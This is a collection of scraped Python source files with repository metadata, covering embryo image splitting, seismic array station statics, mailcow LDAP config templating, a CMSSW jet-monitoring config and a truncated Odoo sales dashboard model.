expt_info[\"placeholder_index\"] = \"\"\n expt_info = expt_info.reset_index().set_index(\"placeholder_index\")\n\n\nfor idx in expt_info.index.unique():\n idx_string = \"_\".join([str(f) for f in utils.make_iterable(idx)])\n output_path = os.path.join(output_root, idx_string)\n os.makedirs(output_path, exist_ok=True)\n curr_batch_info = expt_info.loc[idx]\n segmentation_mask = []\n # for i in range(2):\n for i in range(curr_batch_info.shape[0]):\n file_name = curr_batch_info[\"file_name\"].iloc[i]\n print(file_name)\n img = skio.imread(os.path.join(args.data_folder, \"%s.tif\" % file_name))\n ri = images.extract_bbox_images(img, roi_mask)\n \n for j in range(len(ri)):\n embryo = j+1\n embryo_directory = os.path.join(output_root, idx_string, \"E%d\" % embryo)\n os.makedirs(embryo_directory, exist_ok=True)\n skio.imsave(os.path.join(embryo_directory, \"E%d_%s.tif\" % (embryo, file_name)), ri[j])","repo_name":"adamcohenlab/Jia2023FirstHeartbeat","sub_path":"scripts/split_embryos_manual_ROI.py","file_name":"split_embryos_manual_ROI.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"43329493605","text":"#!/usr/bin/env python3\n# reads in \"*sel.mseed\" for a pair of events\n# align traces by shifting, and record time shifts for station statics\n# plots traces before and after time shift\n# saves aligned traces (not generally used) and static corrections, used in pro3 codes\n# John Vidale, 2/2019\ndef pro4statics(eq_file, ref_trace = 'N.SZW',\n\t\t\t\tdphase = 'PKIKP', dphase2 = 'PKiKP', dphase3 = 'PKIKP', dphase4 = 'PKiKP',\n\t\t\t\tstart_corr_win = -1, end_corr_win = 3, plot_scale_fac = 0.05,\n\t\t\t\tqual_threshold = 0, corr_threshold = 0,\n\t\t\t\tmax_time_shift = 2, min_dist = 150, max_dist = 164, ARRAY = 0):\n\n\tfrom obspy import UTCDateTime\n\tfrom obspy.signal.cross_correlation import xcorr_pick_correction\n\tfrom obspy import Stream\n\tfrom obspy import Trace\n\tfrom obspy import read\n\tfrom obspy.geodetics import gps2dist_azimuth\n\timport numpy as np\n\timport os\n\tfrom obspy.taup import TauPyModel\n\timport matplotlib.pyplot as plt\n\tmodel = TauPyModel(model='iasp91')\n\n\timport sys # don't show any warnings\n\timport warnings\n\n\tif not sys.warnoptions:\n\t warnings.simplefilter(\"ignore\")\n\t#%% Get station location file\n\tif ARRAY == 0: # Hinet set\n\t\tsta_file = '/Users/vidale/Documents/GitHub/Array_codes/Files/hinet_sta.txt'\n\telif ARRAY == 1: # LASA set\n\t\tsta_file = '/Users/vidale/Documents/GitHub/Array_codes/Files/LASA_sta.txt'\n\twith open(sta_file, 'r') as file:\n\t\tlines = file.readlines()\n\tprint('Station file has ' + str(len(lines)) + ' lines.')\n\t# Load station coords into arrays\n\t\t# old line: station_index = range(343)\n\tstation_index = range(len(lines))\n\tst_lats = []\n\tst_lons = []\n\tst_deps = []\n\tst_names = []\n\tfor ii in station_index:\n\t\tline = lines[ii]\n\t\tsplit_line = line.split()\n\t\tst_names.append(split_line[0])\n\t\tst_lats.append( split_line[1])\n\t\tst_lons.append( split_line[2])\n\t\tst_deps.append( split_line[3])\n\n\t# initialize lists of statics\n\tsta_names = []\n\tsta_dists = []\n\tsta_lats = []\n\tsta_lons = []\n\tsta_statics = []\n\tsta_corrs = []\n\n\t#%%\n\t#dphase = 'PKIKP' # phase to be aligned\n\t#dphase2 = 'PKiKP' # another phase to have traveltime plotted\n\t#dphase3 = 'PKP' # another phase to have traveltime plotted\n\t#dphase4 = 'pP' # another phase to have traveltime plotted\n\t#ref_trace = 'N.SZW' # trace with reference waveform\n\t#start_corr_win = 2 # plots start Xs before PKiKP\n\t#end_corr_win = 7 # plots end Xs before PKiKP\n\t#max_time_shift = 2 # searches up to this time shift for alignment\n\tstart_plot_win = 0 # plots start Xs before PKiKP\n\tend_plot_win = 20 # plots end Xs before PKiKP\n\t#corr_threshold = 0. # threshold that correlation is good enough to keep trace\n\t#max_dist = 151\n\t#min_dist = 150.6\n#\tmax_dist = 164\n#\tmin_dist = 150\n\t#plot_scale_fac = 0.2 # Bigger numbers make each trace amplitude bigger on plot\n\t#qual_threshold = 0 # minimum SNR\n\tplot_tt = 1 # plot the traveltimes?\n\tplot_flag = False # plot for each trace? Watch out, can be lots, one for each station pair!!\n\n\t#%% Get saved event info, also used to name files\n\t# event 2016-05-28T09:47:00.000 -56.241 -26.935 78\n\tfile = open(eq_file, 'r')\n\tlines=file.readlines()\n\tsplit_line = lines[0].split()\n#\t\t\tids.append(split_line[0]) ignore label, now \"event\"\n\tt = UTCDateTime(split_line[1])\n\tdate_label = split_line[1][0:10]\n\tev_lat = float( split_line[2])\n\tev_lon = float( split_line[3])\n\tev_depth = float( split_line[4])\n\n\tprint('Date label ' + date_label + ' lat ' + str(ev_lat) + ' lon ' + str(ev_lon))\n\n\tst = Stream()\n#\tfname = 'HD' + date_label + '.mseed'\n\tfname = 'HD' + date_label + 'sel.mseed' # sel file has windowing, shift?, filtering\n\n\tprint('fname ' + fname)\n\n\tos.chdir('/Users/vidale/Documents/PyCode/LASA/Pro_Files/')\n\tos.system('pwd')\n\tst=read(fname)\n\tprint('Read in: ' + str(len(st)) + ' traces')\n\tprint('First trace has : ' + str(len(st[0].data)) + ' time pts ')\n\n\t#%% reference trace, and its starttime, distance, arrival time\n\ttr_ref = Trace()\n\tfor tr in st: # loop over seismograms to find reference trace\n\t\tif (tr.stats.station == ref_trace): # found it\n\t\t\ttr_ref = tr.copy()\n\t\t\tfor ii in station_index: # find station in inventory\n\t\t\t\tthis_name = st_names[ii] # disabled convoluted patch for long Hinet names\n\t\t\t\tthis_name_truc = this_name[0:5]\n\t\t\t\tname_truc_cap = this_name_truc.upper()\n#\t\t\t\tprint(tr.stats.station + ' tr.stats.station ' +st_names[ii] + ' st_names[ii] ' + ref_trace + ' ref_trace ' + name_truc_cap + ' name_truc_cap ' + this_name + ' this_name ' + this_name_truc + ' this_name_truc')\n#\t\t\t\tif (tr.stats.station == name_truc_cap):# found it\n\t\t\t\tif (tr.stats.station == st_names[ii]):# found it\n\t\t\t\t\tprint(tr.stats.station + ' tr.stats.station ' +st_names[ii] + ' st_names[ii] ')\n#\t\t\t\t\tsys.exit()\n\t\t\t\t\tstalon = float(st_lons[ii]) # look up lat & lon again to find distance\n\t\t\t\t\tstalat = float(st_lats[ii])\n\t\t\t\t\tdistance = gps2dist_azimuth(stalat,stalon,ev_lat,ev_lon)\n\t\t\t\t\ttr_ref.stats.distance=distance[0]/(1000.*111) # distance in meters\n\t\t\t\t\tprint('depth ' + str(ev_depth) + ' distance ' + str(tr_ref.stats.distance) + ' phase ' + dphase)\n\t\t\t\t\tarrivals = model.get_travel_times(source_depth_in_km=ev_depth,distance_in_degree\n\t\t\t\t\t\t\t\t\t\t=tr_ref.stats.distance,phase_list=[dphase])\n\t\t\t\t\ttry:\n\t\t\t\t\t\ttr_ref_tt = arrivals[0].time # arrival time\n\t\t\t\t\texcept:\n\t\t\t\t\t\tprint('Station ' + tr.stats.station + ' at distance ' + str(tr_ref.stats.distance) + ' and depth ' + str(ev_depth))\n\t\t\t\t\t\tsys.exit(\"No arrival time for \" + dphase)\n#\tsys.exit()\n\n\tstgood = Stream()\n\tst2 = st.copy() # hard to measure timing of traces without adjusting entire thing\n\tprint('st2 has: ' + str(len(st)) + ' traces' + ' t (origin time) ' + str(t))\n\n\t# get station lat-lon, compute distance for plot\n\tgood_corr = 0\n\tbad_corr = 0\n\tfor tr in st: # do all seismograms\n\t\tfor ii in station_index: # find station in inventory\n\t\t\ttested_name = st_names[ii]\n\t\t\tactual_trace = tr.stats.station\n\t\t\tif ARRAY == 0: # convoluted patch for long Hinet names\n\t\t\t\tthis_name_truc = tested_name[0:5]\n\t\t\t\tname_truc_cap = this_name_truc.upper()\n\t\t\t\tthis_name = name_truc_cap\n\t\t\t\tactual_trace = tr.stats.station.upper\n\t\t\tif (actual_trace == tested_name): # found it\n\t\t\t\ttr_time = tr.stats.starttime # tr_time apparently not used, a relic\n\t\t\t\tstalon = float(st_lons[ii]) # look up lat & lon to find distance\n\t\t\t\tstalat = float(st_lats[ii])\n\t\t\t\tdistance = gps2dist_azimuth(stalat,stalon,ev_lat,ev_lon)\n\t\t\t\ttr.stats.distance=distance[0]/(1000.*111) # distance for phase time and plotting\n\t\t\t\tarrivals = model.get_travel_times(source_depth_in_km=ev_depth,distance_in_degree\n\t\t\t\t\t\t\t\t\t=tr.stats.distance,phase_list=[dphase])\n\t\t\t\tprint('made it to here!!')\n\t\t\t\ttry:\n\t\t\t\t\tdt, coeff = xcorr_pick_correction(t, tr_ref, t, tr,\n\t\t\t\t\t\t\tstart_corr_win, end_corr_win, max_time_shift, plot=plot_flag)\n\t\t\t\t\tprint('also made it to here!!')\n\t\t\t\t\tif dt > max_time_shift:\n\t\t\t\t\t\tprint('Hey! Excess shift: %.3f' % dt)\n\t\t\t\t\t\tprint('Station ' + tr.stats.station + ' corr is ' + str(coeff))\n\t\t\t\t\tif coeff > 1:\n\t\t\t\t\t\tprint('Hey! Excess coeff: %.3f' % coeff)\n\t\t\t\t\t\tprint('Station ' + tr.stats.station + ' corr is ' + str(coeff))\n\t\t\t\t\tif coeff > corr_threshold:\n\t\t\t\t\t\tgood_corr += 1\n\t\t\t\t\t\tif plot_flag == True:\n\t\t\t\t\t\t\tprint('Time correction for pick 2: %.6f' % dt)\n\t\t\t\t\t\t\tprint('Correlation coefficient: %.2f' % coeff)\n\t\t\t\t\t\ttr.stats.starttime -= dt\n\t\t\t\t\t\tsta_names.extend([tr.stats.station])\n\t\t\t\t\t\tsta_dists.extend([tr.stats.distance])\n\t\t\t\t\t\tsta_lats.extend([stalat])\n\t\t\t\t\t\tsta_lons.extend([stalon])\n\t\t\t\t\t\tsta_statics.extend([dt])\n\t\t\t\t\t\tsta_corrs.extend([coeff])\n\t\t\t\t\t\tstgood += tr\n\t\t\t\t\telse:\n\t\t\t\t\t\tbad_corr += 1\n\t\t\t\texcept:\n\t\t\t\t\tprint('No arrival time for ' + tr.stats.station + ' at distance ' + str(tr.stats.distance))\n\t\tsys.exit()\n\n\t##\t\t# store shift to write out\n\t##\t\t\tif coeff > corr_threshold:\n\t#\t\t\t# write out station_name, dt, coeff\n\t#\t\t\t# record shifted waveform in stgood\n\tprint(str(good_corr) + ' out of ' + str(good_corr + bad_corr) + ' are greater than ' + str(corr_threshold))\n\n\n\t#%%\n\t# plot traces\n\tplt.close(5)\n\tplt.figure(5,figsize=(10,10))\n\tplt.xlim(start_plot_win, end_plot_win)\n\tplt.ylim(min_dist, max_dist)\n\n\tfor tr in stgood:\n\t\tdist_offset = tr.stats.distance # trying for approx degrees\n\t\ttime = np.arange(len(tr.data)) * tr.stats.delta + (tr.stats.starttime - t)\n\t\tplt.plot(time, (tr.data - np.median(tr.data))*plot_scale_fac /(tr.data.max()\n\t\t\t- tr.data.min()) + dist_offset, color = 'black')\n\n\t\t#%% Plot traveltime curves\n\tif plot_tt:\n\t\t# first traveltime curve\n\t\tline_pts = 50\n\t\tdist_vec = np.arange(min_dist, max_dist, (max_dist - min_dist)/line_pts) # distance grid\n\t\ttime_vec1 = np.arange(min_dist, max_dist, (max_dist - min_dist)/line_pts) # empty time grid of same length (filled with -1000)\n\t\tfor i in range(0,line_pts):\n\t\t\tarrivals = model.get_travel_times(source_depth_in_km=ev_depth,distance_in_degree\n\t\t\t\t\t\t\t\t\t\t=dist_vec[i],phase_list=[dphase])\n\t\t\tnum_arrivals = len(arrivals)\n\t\t\tfound_it = 0\n\t\t\tfor j in range(0,num_arrivals):\n\t\t\t\tif arrivals[j].name == dphase:\n\t\t\t\t\ttime_vec1[i] = arrivals[j].time\n\t\t\t\t\tfound_it = 1\n\t\t\tif found_it == 0:\n\t\t\t\ttime_vec1[i] = np.nan\n\t# second traveltime curve\n\t\tif dphase2 != 'no':\n\t\t\ttime_vec2 = np.arange(min_dist, max_dist, (max_dist - min_dist)/line_pts) # empty time grid of same length (filled with -1000)\n\t\t\tfor i in range(0,line_pts):\n\t\t\t\tarrivals = model.get_travel_times(source_depth_in_km=ev_depth,distance_in_degree\n\t\t\t\t\t\t\t\t\t\t\t=dist_vec[i],phase_list=[dphase2])\n\t\t\t\tnum_arrivals = len(arrivals)\n\t\t\t\tfound_it = 0\n\t\t\t\tfor j in range(0,num_arrivals):\n\t\t\t\t\tif arrivals[j].name == dphase2:\n\t\t\t\t\t\ttime_vec2[i] = arrivals[j].time\n\t\t\t\t\t\tfound_it = 1\n\t\t\t\tif found_it == 0:\n\t\t\t\t\ttime_vec2[i] = np.nan\n\t\t\tplt.plot(time_vec2,dist_vec, color = 'orange')\n\t\t# third traveltime curve\n\t\tif dphase3 != 'no':\n\t\t\ttime_vec3 = np.arange(min_dist, max_dist, (max_dist - min_dist)/line_pts) # empty time grid of same length (filled with -1000)\n\t\t\tfor i in range(0,line_pts):\n\t\t\t\tarrivals = model.get_travel_times(source_depth_in_km=ev_depth,distance_in_degree\n\t\t\t\t\t\t\t\t\t\t\t=dist_vec[i],phase_list=[dphase3])\n\t\t\t\tnum_arrivals = len(arrivals)\n\t\t\t\tfound_it = 0\n\t\t\t\tfor j in range(0,num_arrivals):\n\t\t\t\t\tif arrivals[j].name == dphase3:\n\t\t\t\t\t\ttime_vec3[i] = arrivals[j].time\n\t\t\t\t\t\tfound_it = 1\n\t\t\t\tif found_it == 0:\n\t\t\t\t\ttime_vec3[i] = np.nan\n\t\t\tplt.plot(time_vec3,dist_vec, color = 'yellow')\n\t\t# fourth traveltime curve\n\t\tif dphase4 != 'no':\n\t\t\ttime_vec4 = np.arange(min_dist, max_dist, (max_dist - min_dist)/line_pts) # empty time grid of same length (filled with -1000)\n\t\t\tfor i in range(0,line_pts):\n\t\t\t\tarrivals = model.get_travel_times(source_depth_in_km=ev_depth,distance_in_degree\n\t\t\t\t\t\t\t\t\t\t\t=dist_vec[i],phase_list=[dphase4])\n\t\t\t\tnum_arrivals = len(arrivals)\n\t\t\t\tfound_it = 0\n\t\t\t\tfor j in range(0,num_arrivals):\n\t\t\t\t\tif arrivals[j].name == dphase4:\n\t\t\t\t\t\ttime_vec4[i] = arrivals[j].time\n\t\t\t\t\t\tfound_it = 1\n\t\t\t\tif found_it == 0:\n\t\t\t\t\ttime_vec4[i] = np.nan\n\t\t\tplt.plot(time_vec4,dist_vec, color = 'purple')\n\n\t\tplt.plot(time_vec1,dist_vec, color = 'blue')\n\t\tplt.show()\n\n\tplt.xlabel('Time (s)')\n\tplt.ylabel('Epicentral distance from event (°)')\n\tplt.title('Post-alignment ' + dphase + ' for ' + fname[2:12])\n\tplt.show()\n\n\t#%%\n\t# plot traces before time shifts\n\tplt.close(6)\n\tplt.figure(6,figsize=(10,10))\n\tplt.xlim(start_plot_win, end_plot_win)\n\tplt.ylim(min_dist, max_dist)\n\n\tfor tr in st2: # regenerate distances into st2 as they were loaded into st for plots\n\t\tfor ii in station_index: # find station in inventory\n\t\t\ttested_name = st_names[ii]\n\t\t\tactual_trace = tr.stats.station\n\t\t\tif ARRAY == 0: # convoluted patch for long Hinet names\n\t\t\t\tthis_name_truc = tested_name[0:5]\n\t\t\t\tname_truc_cap = this_name_truc.upper()\n\t\t\t\tthis_name = name_truc_cap\n\t\t\t\tactual_trace = tr.stats.station.upper\n\t\t\tif (actual_trace == tested_name): # found it\n\t\t\t\tstalon = float(st_lons[ii]) # look up lat & lon to find distance\n\t\t\t\tstalat = float(st_lats[ii])\n\t\t\t\tdistance = gps2dist_azimuth(stalat,stalon,ev_lat,ev_lon)\n\t\t\t\ttr.stats.distance=distance[0]/(1000.*111) # distance for phase time and plotting\n\n\tfor tr in st2: # generate plot\n\t\tdist_offset = tr.stats.distance # trying for approx degrees\n\t\ttime = np.arange(len(tr.data)) * tr.stats.delta + (tr.stats.starttime - t)\n\t\tplt.plot(time, (tr.data - np.median(tr.data))*plot_scale_fac /(tr.data.max()\n\t\t\t- tr.data.min()) + dist_offset, color = 'black')\n\n\t\t#%% Plot traveltime curves\n\tif plot_tt:\n\t\t# first traveltime curve\n\t\tline_pts = 50\n\t\tdist_vec = np.arange(min_dist, max_dist, (max_dist - min_dist)/line_pts) # distance grid\n\t\ttime_vec1 = np.arange(min_dist, max_dist, (max_dist - min_dist)/line_pts) # empty time grid of same length (filled with -1000)\n\t\tfor i in range(0,line_pts):\n\t\t\tarrivals = model.get_travel_times(source_depth_in_km=ev_depth,distance_in_degree\n\t\t\t\t\t\t\t\t\t\t=dist_vec[i],phase_list=[dphase])\n\t\t\tnum_arrivals = len(arrivals)\n\t\t\tfound_it = 0\n\t\t\tfor j in range(0,num_arrivals):\n\t\t\t\tif arrivals[j].name == dphase:\n\t\t\t\t\ttime_vec1[i] = arrivals[j].time\n\t\t\t\t\tfound_it = 1\n\t\t\tif found_it == 0:\n\t\t\t\ttime_vec1[i] = np.nan\n\t# second traveltime curve\n\t\tif dphase2 != 'no':\n\t\t\ttime_vec2 = np.arange(min_dist, max_dist, (max_dist - min_dist)/line_pts) # empty time grid of same length (filled with -1000)\n\t\t\tfor i in range(0,line_pts):\n\t\t\t\tarrivals = model.get_travel_times(source_depth_in_km=ev_depth,distance_in_degree\n\t\t\t\t\t\t\t\t\t\t\t=dist_vec[i],phase_list=[dphase2])\n\t\t\t\tnum_arrivals = len(arrivals)\n\t\t\t\tfound_it = 0\n\t\t\t\tfor j in range(0,num_arrivals):\n\t\t\t\t\tif arrivals[j].name == dphase2:\n\t\t\t\t\t\ttime_vec2[i] = arrivals[j].time\n\t\t\t\t\t\tfound_it = 1\n\t\t\t\tif found_it == 0:\n\t\t\t\t\ttime_vec2[i] = np.nan\n\t\t\tplt.plot(time_vec2,dist_vec, color = 'orange')\n\t\t# third traveltime curve\n\t\tif dphase3 != 'no':\n\t\t\ttime_vec3 = np.arange(min_dist, max_dist, (max_dist - min_dist)/line_pts) # empty time grid of same length (filled with -1000)\n\t\t\tfor i in range(0,line_pts):\n\t\t\t\tarrivals = model.get_travel_times(source_depth_in_km=ev_depth,distance_in_degree\n\t\t\t\t\t\t\t\t\t\t\t=dist_vec[i],phase_list=[dphase3])\n\t\t\t\tnum_arrivals = len(arrivals)\n\t\t\t\tfound_it = 0\n\t\t\t\tfor j in range(0,num_arrivals):\n\t\t\t\t\tif arrivals[j].name == dphase3:\n\t\t\t\t\t\ttime_vec3[i] = arrivals[j].time\n\t\t\t\t\t\tfound_it = 1\n\t\t\t\tif found_it == 0:\n\t\t\t\t\ttime_vec3[i] = np.nan\n\t\t\tplt.plot(time_vec3,dist_vec, color = 'yellow')\n\t\t# fourth traveltime curve\n\t\tif dphase4 != 'no':\n\t\t\ttime_vec4 = np.arange(min_dist, max_dist, (max_dist - min_dist)/line_pts) # empty time grid of same length (filled with -1000)\n\t\t\tfor i in range(0,line_pts):\n\t\t\t\tarrivals = model.get_travel_times(source_depth_in_km=ev_depth,distance_in_degree\n\t\t\t\t\t\t\t\t\t\t\t=dist_vec[i],phase_list=[dphase4])\n\t\t\t\tnum_arrivals = len(arrivals)\n\t\t\t\tfound_it = 0\n\t\t\t\tfor j in range(0,num_arrivals):\n\t\t\t\t\tif arrivals[j].name == dphase4:\n\t\t\t\t\t\ttime_vec4[i] = arrivals[j].time\n\t\t\t\t\t\tfound_it = 1\n\t\t\t\tif found_it == 0:\n\t\t\t\t\ttime_vec4[i] = np.nan\n\t\t\tplt.plot(time_vec4,dist_vec, color = 'purple')\n\n\t\tplt.plot(time_vec1,dist_vec, color = 'blue')\n\t\tplt.show()\n\n\tplt.xlabel('Time (s)')\n\tplt.ylabel('Epicentral distance from event (°)')\n\tplt.title('Pre-alignment ' + dphase + ' for ' + fname[2:12])\n\tplt.show()\n\n\t# Save aligned traces\n\tfname_sfile = 'HA' + date_label[:10] + 'pro4_' + dphase + '.mseed'\n\tfname_stats = 'HA' + date_label[:10] + 'pro4_' + dphase + '.statics'\n\n\tfname_sfile = '/Users/vidale/Documents/Github/Array_codes/Files/' + fname_sfile\n\tfname_stats = '/Users/vidale/Documents/Github/Array_codes/Files/' + fname_stats\n\n\tstgood.write(fname_sfile,format = 'MSEED')\n\n\t# Save station static correction files\n\t#fname_stats = 'Statics' + etime[:10] + dphase + ref_trace + '.txt'\n\tstats_file = open(fname_stats, 'w')\n\tlen_file1 = len(sta_names)\n\tfor j in range(0,len_file1):\n\t\tdist_str = '{:.2f}'.format( sta_dists[j]) # 3 digits after decimal place\n\t\tlat_str = '{:.4f}'.format( sta_lats[j]) # 2 digits after decimal place\n\t\tlon_str = '{:.4f}'.format( sta_lons[j])\n\t\tstat_str = '{:.3f}'.format(sta_statics[j])\n\t\tcorr_str = '{:.3f}'.format( sta_corrs[j])\n\t\twrite_line = sta_names[j] +' ' + dist_str +' ' + lat_str +' ' + lon_str +' ' + stat_str + ' ' + corr_str + '\\n'\n\t\tstats_file.write(write_line)\n\tfile.close()\n\tprint('Correlation files have: ' + str(len_file1) + ' traces')\n\n\tos.system('say \"Done\"')","repo_name":"JohnVidale/Array_codes","sub_path":"Process/pro4_get_shifts_LASA.py","file_name":"pro4_get_shifts_LASA.py","file_ext":"py","file_size_in_byte":16198,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"33625205734","text":"import logging, os\n\nfrom pathlib import Path\nfrom requests.exceptions import ConnectionError\n\ndef applyAllTemplates(config, dockerapi=None):\n files = [\n 'dovecot/ldap/passdb.conf',\n 'dovecot/extra.conf',\n 'sogo/plist_ldap'\n ]\n\n configChanged = False\n for file in files:\n thisConfigChanged = _applyTemplate(file, config)\n configChanged = configChanged or thisConfigChanged\n\n if configChanged and dockerapi:\n logging.info(\"One or more config files have been changed, restarting dovecot-mailcow and sogo-mailcow now!\")\n try:\n dockerapi.waitForContainersToBeRunning([\"sogo-mailcow\", \"dovecot-mailcow\"])\n dockerapi.restartContainer(\"sogo-mailcow\")\n dockerapi.restartContainer(\"dovecot-mailcow\")\n except:\n print()\n logging.warning(\"Could not restart containers because of an exception.\")\n elif not dockerapi:\n logging.info(\"One or more config files have been changed, please make sure to restart dovecot-mailcow and sogo-mailcow!\")\n\ndef _applyTemplate(filePath, config):\n\n configFilePath = f\"conf/{filePath}\"\n templateFilePath = f\"templates/{filePath}\"\n\n with open(templateFilePath) as f:\n templateData = f.read()\n\n templateVariables = {\n \"ldapUri\": config['LDAP_URI'],\n \"ldapBaseDn\": config['LDAP_BASE_DN'],\n \"ldapBindDn\": config['LDAP_BIND_DN'],\n \"ldapBindPassword\": config['LDAP_BIND_DN_PASSWORD'],\n \"ldapUserFilter\": config['LDAP_USER_FILTER'],\n \"ldapSogoUserFilter\": config['LDAP_SOGO_USER_FILTER']\n }\n \n for key, value in templateVariables.items():\n templateData = templateData.replace(f\"@@{key}@@\", value)\n\n if os.path.isfile(configFilePath):\n with open(configFilePath) as f:\n oldFileContents = f.read()\n\n if oldFileContents.strip() == templateData.strip():\n logging.info(f\"Config file {configFilePath} unchanged\")\n return False\n\n backupIndex = 1\n backupFile = f\"{configFilePath}.linuxmuster_mailcow_bak\"\n while os.path.exists(backupFile):\n backupFile = f\"{configFilePath}.linuxmuster_mailcow_bak.{backupIndex}\"\n backupIndex += 1\n\n os.rename(configFilePath, backupFile)\n logging.info(f\"Backed up {configFilePath} to {backupFile}\")\n\n Path(os.path.dirname(configFilePath)).mkdir(parents=True, exist_ok=True)\n\n print(templateData, file=open(configFilePath, 'w'))\n \n logging.info(f\"Saved generated config file to {configFilePath}\")\n return True","repo_name":"netzint/linuxmuster-mailcow","sub_path":"src/templateHelper.py","file_name":"templateHelper.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"40140130190","text":"import FWCore.ParameterSet.Config as cms\n\nfrom DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer\npfJetDQMAnalyzer = DQMEDAnalyzer('PFJetDQMAnalyzer',\n InputCollection = cms.InputTag('ak4PFJets'),\n MatchCollection = cms.InputTag('ak4CaloJets'),\n BenchmarkLabel = cms.string('ParticleFlow/PFVsCalo'),\n deltaRMax = cms.double(0.1),\n onlyTwoJets = cms.bool(False),\n matchCharge = cms.bool(False),\n mode = cms.int32( 1 ),\n CreatePFractionHistos = cms.bool(False),\n ptMin = cms.double( 0.0 ),\n ptMax = cms.double( 999999 ),\n etaMin = cms.double(-10),\n etaMax = cms.double(10),\n phiMin = cms.double(-3.14),\n phiMax = cms.double(3.14),\n# Histogram Parameters related to pt\n VariablePtBins = cms.vdouble(0.,1.,2.,5.,10.,20.,50.,100.,200.,400.,500.),\n PtHistoParameter = cms.PSet(\n switchOn = cms.bool(True),\n nBin = cms.int32(100),\n xMin = cms.double(0.0),\n xMax = cms.double(200.0)\n ),\n DeltaPtHistoParameter = cms.PSet(\n switchOn = cms.bool(True),\n nBin = cms.int32(100),\n xMin = cms.double(-100.0),\n xMax = cms.double(100.0)\n ),\n DeltaPtOvPtHistoParameter = cms.PSet(\n switchOn = cms.bool(True),\n BROn = cms.bool(False), BREtaMin = cms.double(0.0), BREtaMax = cms.double(1.4),\n EROn = cms.bool(False), EREtaMin = cms.double(1.6), EREtaMax = cms.double(2.4),\n slicingOn = cms.bool(False),\n nBin = cms.int32(200),\n xMin = cms.double(-3.0),\n xMax = cms.double(3.0)\n ),\n# Histogram Parameters related to Eta\n EtaHistoParameter = cms.PSet(\n switchOn = cms.bool(True),\n nBin = cms.int32(100),\n xMin = cms.double(-5.0),\n xMax = cms.double(5.0)\n ),\n DeltaEtaHistoParameter = cms.PSet(\n switchOn = cms.bool(True),\n nBin = cms.int32(50),\n xMin = cms.double(-0.2),\n xMax = cms.double(0.2)\n ),\n# Histogram Parameters related to Phi\n PhiHistoParameter = cms.PSet(\n switchOn = cms.bool(True),\n nBin = cms.int32(64),\n xMin = cms.double(-3.2),\n xMax = cms.double(3.2)\n ),\n DeltaPhiHistoParameter = cms.PSet(\n switchOn = cms.bool(True),\n nBin = cms.int32(50),\n xMin = cms.double(-0.2),\n xMax = cms.double(0.2)\n ),\n DeltaRHistoParameter = cms.PSet(\n switchOn = cms.bool(True),\n nBin = cms.int32(50),\n xMin = cms.double(0.0),\n xMax = cms.double(0.5)\n ),\n# Histogram Parameters related to Charge\n ChargeHistoParameter = cms.PSet(\n switchOn = cms.bool(False),\n nBin = cms.int32(3),\n xMin = cms.double(-1.5),\n xMax = cms.double(1.5)\n )\n)\n","repo_name":"cms-sw/cmssw","sub_path":"DQMOffline/PFTau/python/PFJetDQMAnalyzer_cfi.py","file_name":"PFJetDQMAnalyzer_cfi.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","stars":985,"dataset":"github-code","pt":"50"} +{"seq_id":"33991650987","text":"from odoo import api, fields, models, tools, _\nfrom odoo.http import Controller, request\nimport time, datetime\nfrom odoo.exceptions import UserError\nfrom odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT\nfrom odoo.exceptions import ValidationError, RedirectWarning, except_orm\nfrom odoo.addons import decimal_precision as dp\nfrom odoo.tools.float_utils import float_is_zero, float_compare\nfrom odoo.tools import pycompat\nfrom odoo.tools.float_utils import float_round\nfrom datetime import timedelta\nimport datetime\nimport dateutil.relativedelta\nfrom datetime import datetime as dt\nfrom lxml import etree\nfrom threading import Timer\nimport random\n\n\nclass SalesDashboard(models.Model):\n _description = \"Sales Detail\"\n _name = \"sales.dashboard\"\n\n active = fields.Boolean('Active', default=True, store=True)\n name = fields.Selection([\n ('crm.enquiry', 'Enquiries'),\n ('sale.quotation', 'Quotations'),\n ('sale.order', 'Sales Orders'),\n ('pick', 'Pick'),\n ('sale.agreement', 'Sale Agreement'),\n ('res.partner', 'Customers'),\n ('sale.agreement', 'Sale Agreement'),\n ('product.template', 'Finish Goods'),\n ('pack', 'Pack'),\n ('dispatch', 'Dispatch')\n\n ], string=\"Name\")\n computation = fields.Char(compute=\"_computation\")\n user_id = fields.Many2one('res.users', 'User')\n company_id = fields.Many2one('res.company', 'Company')\n total = fields.Integer(\"Total\")\n pending = fields.Integer(\"Pending\")\n sent = fields.Integer(\"Sent\")\n color = fields.Integer('Color')\n view_type = fields.Boolean('Type', default=True)\n emp_id = fields.Integer(\"Employee Id\")\n approved = fields.Integer(\"Approved\")\n confirm = fields.Integer(\"Confirm\")\n cancel = fields.Integer(\"Cancel\")\n draft = fields.Integer(\"Draft\")\n hsn = fields.Integer(\"Not Having HSN\")\n not_validated = fields.Integer(\"Not Validated\")\n no_email = fields.Integer(\"Not Email\")\n ready = fields.Integer(\"Ready\")\n partially = fields.Integer(\"Partially\")\n amendment = fields.Integer(\"Amendment\")\n\n @api.multi\n def _computation(self):\n for record in self:\n if record.user_id.id == self.env.user.id and record.company_id.id == record.env.user.company_id.id:\n record.env.cr.execute(\"select * from sales_dashboard_query where model_name='%s'\" % (str(record.name)))\n model_data = record.env.cr.dictfetchall()\n if model_data:\n complete_data = {}\n for model in model_data:\n complete_data[model['label_name']] = (self.execute_management_query(model))\n record.sudo().write(\n {\n 'total': len(complete_data.get('total', 0) if complete_data.get('total', 0) != 0 else []),\n 'pending': len(complete_data.get('pending', 0) if complete_data.get('pending', 0) != 0 else []),\n 'approved': len(complete_data.get('approved', 0) if complete_data.get('approved', 0) != 0 else []),\n 'sent': len(complete_data.get('sent', 0) if complete_data.get('sent', 0) != 0 else []),\n 'confirm': len(complete_data.get('confirm', 0) if complete_data.get('confirm', 0) != 0 else []),\n 'cancel': len(complete_data.get('cancel', 0) if complete_data.get('cancel', 0) != 0 else []),\n 'draft': len(complete_data.get('draft', 0) if complete_data.get('draft', 0) != 0 else []),\n 